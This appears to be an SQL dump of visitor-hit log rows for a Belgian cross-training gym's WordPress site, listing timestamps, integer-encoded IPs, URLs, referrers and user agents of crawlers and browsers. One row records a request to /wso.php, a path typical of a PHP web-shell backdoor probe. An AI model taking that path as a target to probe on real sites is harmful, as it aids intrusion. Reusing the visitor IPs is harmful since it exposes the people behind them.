(69022, 1491655146.450323, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69023, 1491655848.952401, 3639886562, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69024, 1491660574.568390, 3273261685, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69025, 1491668300.500915, 1538567118, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko)'),
(69026, 1491668300.992525, 1538567118, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69027, 1491668301.782293, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69028, 1491668302.296932, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69029, 1491668302.765303, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69030, 1491668303.194716, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69031, 1491668303.646062, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69032, 1491668304.106056, 1538567118, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69033, 1491668304.533516, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69034, 1491668304.958642, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69035, 1491668305.379515, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69036, 1491668305.861523, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69037, 1491668306.317736, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69038, 1491668306.749363, 1538567118, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69039, 1491671544.282516, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69040, 1491671765.800812, 2509959761, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(69041, 1491671860.773168, 2509959761, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(69042, 1491678566.745479, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69043, 1491678567.254531, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69044, 1491678567.744752, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69045, 1491678568.273791, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69046, 1491678568.786755, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69047, 1491678569.365067, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69048, 1491678569.909173, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69049, 1491678570.421495, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69050, 1491678570.948439, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69051, 1491678571.554055, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69052, 1491678572.061603, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69053, 1491681284.930531, 1123633451, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69054, 1491681286.511108, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69055, 1491681286.956529, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69056, 1491683322.529584, 100662543, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69057, 1491688812.570570, 2655385526, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; WebHistoryBot/1.2.1 IS NOT SE bot like Googlebot/2.1; +http://www.google.com/bot.html,Yahoo! Slurp or Bingbot)'),
(69058, 1491690645.224218, 878096387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(69059, 1491690646.207258, 878096387, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'ia_archiver'),
(69060, 1491690874.697507, 2513068705, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(69061, 1491695260.598060, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69062, 1491695261.134076, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69063, 1491698930.327430, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69064, 1491702287.195414, 676177670, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69065, 1491702295.972294, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69066, 1491710288.760146, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69067, 1491710548.999369, 1482900679, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:29.0) Gecko/20100101 Firefox/29.0'),
(69068, 1491711018.767812, 1868102847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69069, 1491711071.794389, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69070, 1491713251.662172, 2637637525, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69071, 1491714258.610068, 856623645, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wso.php', 'http://www.crosstrainingcenter.be/wso.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(69072, 1491714565.390678, 3024883485, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69073, 1491719087.773527, 1463833377, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69074, 1491719092.803571, 1463833377, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69075, 1491719100.190005, 1463833377, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69076, 1491719127.804971, 1463833377, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69077, 1491719138.776168, 1463833377, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69078, 1491721396.223656, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69079, 1491721396.813188, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69080, 1491721397.285506, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69081, 1491721397.760254, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69082, 1491721398.223661, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69083, 1491721398.667175, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69084, 1491721399.242573, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69085, 1491721399.704012, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69086, 1491721400.155550, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69087, 1491721400.615980, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69088, 1491721401.088211, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69089, 1491721549.645634, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69090, 1491723275.621032, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69091, 1491733424.785646, 1844204747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', 'http://www.crosstrainingcenter.be/feed/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69092, 1491733434.999030, 1844204747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?rss', 'http://www.crosstrainingcenter.be/?rss', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69093, 1491733445.510611, 1844204747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?rss2', 'http://www.crosstrainingcenter.be/?rss2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69094, 1491733460.509334, 1844204747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69095, 1491737424.275268, 1463966064, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko)'),
(69096, 1491737424.713640, 1463966064, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69097, 1491737425.123598, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69098, 1491737425.520833, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69099, 1491737426.128653, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69100, 1491737426.523336, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69101, 1491737426.924042, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69102, 1491737427.371390, 1463966064, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69103, 1491737427.777755, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69104, 1491737428.169664, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69105, 1491737428.657479, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69106, 1491737429.098776, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69107, 1491737429.511839, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69108, 1491737429.908471, 1463966064, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11602.4.8.0.1 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69109, 1491750747.313350, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69110, 1491754253.447773, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69111, 1491755368.677586, 3657085979, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69112, 1491756211.274913, 1538656464, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69113, 1491756213.735535, 1538656464, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69114, 1491763150.448214, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69115, 1491763151.002707, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69116, 1491763151.496742, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69117, 1491763151.990148, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69118, 1491763152.492951, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69119, 1491763153.024393, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69120, 1491763153.562549, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69121, 1491763154.046330, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69122, 1491763154.516130, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69123, 1491763154.982888, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69124, 1491763155.434359, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69125, 1491767380.180781, 3475901903, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69126, 1491767380.737702, 3475901903, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69127, 1491767389.823577, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69128, 1491768359.505710, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69129, 1491768359.946864, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69130, 1491773485.600372, 3475901941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69131, 1491773767.997279, 3475901941, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69132, 1491774622.857960, 3657085979, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69133, 1491777560.240131, 3024883596, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69134, 1491782272.932664, 2745975055, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69135, 1491783900.100083, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69136, 1491783961.125536, 3657085979, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69137, 1491786600.093571, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69138, 1491788270.532930, 3475901941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69139, 1491789543.748278, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69140, 1491790690.380481, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69141, 1491793878.418936, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69142, 1491793878.870169, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69143, 1491793886.161632, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69144, 1491793897.542136, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69145, 1491793907.559317, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69146, 1491793912.333409, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69147, 1491793919.310914, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
